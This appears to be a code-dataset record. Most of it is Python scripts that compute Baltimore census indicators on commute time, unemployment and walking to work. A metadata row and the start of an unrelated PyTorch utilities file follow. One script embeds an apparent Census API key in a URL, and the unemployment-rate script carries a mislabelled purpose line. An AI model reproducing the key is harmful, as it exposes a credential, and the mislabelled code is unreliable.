df1['totalPop'] = total
return df1['totalPop']
# Cell
#File: trav14.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 0-14 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav14( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_002E','B08303_003E','B08303_004E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_002E','B08303_003E','B08303_004E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav14_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_002E','B08303_003E','B08303_004E','B08303_001E'])
)
update vital_signs.data
set trav14_ = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav29.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 15-29 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav29( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_005E','B08303_006E','B08303_007E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_005E','B08303_006E','B08303_007E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav29_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_005E','B08303_006E','B08303_007E','B08303_001E'])
)
update vital_signs.data
set trav29_ = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav45.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 45 Minutes and Over Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav45( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_011E','B08303_012E','B08303_013E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_011E','B08303_012E','B08303_013E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_011E','B08303_012E','B08303_013E','B08303_001E'])
)
update vital_signs.data
set trav45_ = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: trav44.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08303 - TRAVEL TIME TO WORK,
# (Universe: Workers 16 years and over who did not work at home)
# Table Creates: trav14, trav29, trav44, trav45
#purpose: Produce Sustainability - Percent of Employed Population with Travel Time to Work of 30-44 Minutes Indicator
#input: Year
#output:
import pandas as pd
import glob
def trav44( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08303*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08303_008E','B08303_009E','B08303_010E','B08303_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08303_008E','B08303_009E','B08303_010E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08303_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <trav44_14> */ --
WITH tbl AS (
select csa,
( (value[1] + value[2] + value[3] ) / nullif(value[4],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08303_008E','B08303_009E','B08303_010E','B08303_001E']) )
update vital_signs.data
set trav44_ = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: unempl.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe - Population 16 years and over
#Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Workforce and Economic Development - Percent Population 16-64 Unemployed and Looking for Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def unempl( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = [ 'B23001_003E','B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E', 'B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_003E', 'B23001_010E', 'B23001_017E', 'B23001_024E', 'B23001_031E', 'B23001_038E', 'B23001_045E', 'B23001_052E', 'B23001_059E', 'B23001_066E', 'B23001_089E', 'B23001_096E', 'B23001_103E', 'B23001_110E', 'B23001_117E', 'B23001_124E', 'B23001_131E', 'B23001_138E', 'B23001_145E', 'B23001_152E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unempl 16-64
# /
# nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <unempl_14> */ --
WITH tbl AS (
select csa,
( ( value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unempl 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) -- population 16 to 64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY[ 'B23001_003E','B23001_010E','B23001_017E','B23001_024E','B23001_031E','B23001_038E','B23001_045E','B23001_052E','B23001_059E','B23001_066E','B23001_089E','B23001_096E','B23001_103E','B23001_110E','B23001_117E','B23001_124E','B23001_131E','B23001_138E','B23001_145E','B23001_152E','B23001_008E','B23001_015E','B23001_022E','B23001_029E','B23001_036E','B23001_043E','B23001_050E','B23001_057E','B23001_064E','B23001_071E','B23001_094E','B23001_101E','B23001_108E','B23001_115E','B23001_122E','B23001_129E','B23001_136E','B23001_143E','B23001_150E','B23001_157E'])
)
update vital_signs.data
set unempl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: unempr.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B23001 - SEX BY AGE BY EMPLOYMENT STATUS FOR THE POPULATION 16 YEARS AND OVER
# Universe: Workers 16 years and over
#Table Creates: empl, unempl, unempr, nilf
#purpose: Produce Sustainability - Percent of Population that Walks to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def unempr( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B23001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = [ 'B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E',
'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E',
'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E', 'B23001_008E',
'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E',
'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E',
'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E',
'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E',
'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E',
'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E',
'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( ( value[21]+ value[22]+ value[23]+ value[24]+ value[25]+ value[26]+ value[27]+ value[28]+ value[29]+ value[30]+ value[31]+ value[32]+ value[33]+ value[34]+v alue[35]+ value[36]+ value[37]+ value[38]+ value[39]+ value[40]) --civil labor force unemployed 16-64 / nullif( (value[1] +value[2]+ value[3]+ value[4]+ value[5]+ value[6]+ value[7]+ value[8]+ value[9]+ value[10]+ value[11]+ value[12]+ value[13]+ value[14]+ value[15]+ value[16]+ value[17]+ value[18]+ value[19]+ value[20]) --civil labor force 16-64 ,0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[21]+value[22]+value[23]+value[24]+value[25]+value[26]+value[27]+value[28]+value[29]+value[30]+value[31]+value[32]+value[33]+value[34]+value[35]+value[36]+value[37]+value[38]+value[39]+value[40]) --civil labor force unemployed 16-64 / nullif( (value[1]+value[2]+value[3]+value[4]+value[5]+value[6]+value[7]+value[8]+value[9]+value[10]+value[11]+value[12]+value[13]+value[14]+value[15]+value[16]+value[17]+value[18]+value[19]+value[20]) --civil labor force 16-64 ,0) )*100::numeric
as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B23001_006E', 'B23001_013E', 'B23001_020E', 'B23001_027E', 'B23001_034E', 'B23001_041E', 'B23001_048E', 'B23001_055E', 'B23001_062E', 'B23001_069E', 'B23001_092E', 'B23001_099E', 'B23001_106E', 'B23001_113E', 'B23001_120E', 'B23001_127E', 'B23001_134E', 'B23001_141E', 'B23001_148E', 'B23001_155E', 'B23001_008E', 'B23001_015E', 'B23001_022E', 'B23001_029E', 'B23001_036E', 'B23001_043E', 'B23001_050E', 'B23001_057E', 'B23001_064E', 'B23001_071E', 'B23001_094E', 'B23001_101E', 'B23001_108E', 'B23001_115E', 'B23001_122E', 'B23001_129E', 'B23001_136E', 'B23001_143E', 'B23001_150E', 'B23001_157E'] )
)
update vital_signs.data
set unempr = result from tbl where data2.csa = tbl.csa and update_data_year = '2013' and data_year = '2014';
"""
# Cell
#export
#File: walked.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 years and over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Walks to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def walked( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]+x[getColName(df, c2)] if x[getColName(df, c1)]+x[getColName(df, c2)] != 0 else 0, axis=1)
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Lables by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be opperated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_033E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_033E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
# construct the denominator, returns 0 iff the other two rows are equal.
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# value[3] / nullif((value[1]-value[2]),0)
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_010E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
WITH tbl AS (
select csa,
(
value[3]
/ nullif((value[1]-value[2]),0)
)*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B08101_001E','B08101_049E','B08101_033E'])
)
update vital_signs.data
set walked = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
""" | 35.086793 | 658 | 0.633281 | 21,200 | 149,575 | 4.361368 | 0.034434 | 0.047501 | 0.027558 | 0.013779 | 0.906901 | 0.894604 | 0.880771 | 0.870118 | 0.864494 | 0.853982 | 0 | 0.109194 | 0.208584 | 149,575 | 4,263 | 659 | 35.086793 | 0.671885 | 0.284192 | 0 | 0.832574 | 1 | 0.003986 | 0.188512 | 0.065345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164009 | false | 0 | 0.055809 | 0.111617 | 0.300114 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
01abaf511f9372f233f704669b1a31cb238e217d | 22,136 | py | Python | superresolution_stage/models/archs/net_utils.py | xian1234/SRBuildSeg | db16ae2aba6aaa336a0b612446c80b4546b96a1f | [
"MIT"
] | 9 | 2021-04-06T12:46:47.000Z | 2022-03-26T09:10:11.000Z | superresolution_stage/models/archs/net_utils.py | xian1234/SRBuildSeg | db16ae2aba6aaa336a0b612446c80b4546b96a1f | [
"MIT"
] | null | null | null | superresolution_stage/models/archs/net_utils.py | xian1234/SRBuildSeg | db16ae2aba6aaa336a0b612446c80b4546b96a1f | [
"MIT"
] | null | null | null | # encoding:utf-8
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
def init_weights(w, init_type):
if init_type == 'w_init_relu':
nn.init.kaiming_uniform_(w, nonlinearity = 'relu')
elif init_type == 'w_init_leaky':
nn.init.kaiming_uniform_(w, nonlinearity = 'leaky_relu')
elif init_type == 'w_init':
nn.init.uniform_(w)
def activation(activation):
if activation == 'relu':
return nn.ReLU(inplace = True)
elif activation == 'leaky_relu':
return nn.LeakyReLU(negative_slope = 0.1 ,inplace = True )
elif activation == 'selu':
return nn.SELU(inplace = True)
elif activation == 'linear':
return nn.Linear()
# --------------------FlowNet parts--------------------------------------
# class conv_activation(nn.Module):
# def __init__(self, in_ch, out_ch, kernel_size = 0 , stride = 0, padding = 0, activation = 'relu', init_type = 'w_init_relu'):
# super(conv_activation, self).__init__()
# self.conv = nn.Conv2d(in_ch, out_ch, kernel_size,stride, padding)
# init_weights(self.conv, init_type = init_type)
# self.activation = activation(activation = activation)
# def forward(self, x):
# x1 = self.conv(x)
# x2 = self.activation(x1)
# return x2
# class flow(nn.Module):
# def __init__(self,in_ch, out_ch = 2, kernel_size = 3 , stride = 1, padding = 1, activation = 'linear', init_type = 'w_init' ):
# super(flow, self).__init__()
# self.conv = nn.Conv2d(in_ch, out_ch, kernel_size,stride, padding)
# init_weights(self.conv, init_type = init_type)
# self.activation = activation(activation = activation)
# def forward(self,x):
# x1 = self.conv(x)
# x2 = self.activation(x1)
# return x2
# class leaky_deconv(nn.Module):
# def __init__(self,in_ch, out_ch, deconv = 'default',activation = 'leaky_relu', init_type = 'w_init_leaky' ):
# super(leaky_deconv, self).__init__()
# if deconv == 'default':
# self.up = nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = True)
# init_weights(self.up, init_type = init_type)
# self.conv = conv_activation(in_ch, out_ch, kernel_size = 1, stride = 1 ,padding = 0, activation = activation,init_type = init_type)
# else:
# #TODO
# print 'deconv type errors'
# sys.exit(0)
# def forward(self,x):
# x1 = self.up(x)
# x2 = self.conv(x1)
# return x2
# class upsample(nn.Module):
# def __init__(self,in_ch, out_ch, deconv = 'default',activation = 'linear', init_type = 'w_init' ):
# super(upsample, self).__init__()
# if deconv == 'default':
# self.up = nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = True)
# init_weights(self.up, init_type = init_type)
# self.conv = conv_activation(in_ch, out_ch, kernel_size = 1, stride = 1 ,padding = 0, activation = activation,init_type = init_type)
# else:
# #TODO
# print 'deconv type errors'
# sys.exit(0)
# def forward(self,x):
# x1 = self.up(x)
# x2 = self.conv(x1)
# return x2
# ---------------------------------fuction------------------------------------
def conv_activation(in_ch, out_ch , kernel_size = 3, stride = 1, padding = 1, activation = 'relu', init_type = 'w_init_relu'):
if activation == 'relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.ReLU(inplace = True))
elif activation == 'leaky_relu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.LeakyReLU(negative_slope = 0.1 ,inplace = True ))
elif activation == 'selu':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding),
nn.SELU(inplace = True))
elif activation == 'linear':
return nn.Sequential(
nn.Conv2d(in_ch, out_ch, kernel_size = kernel_size, stride = stride, padding = padding))
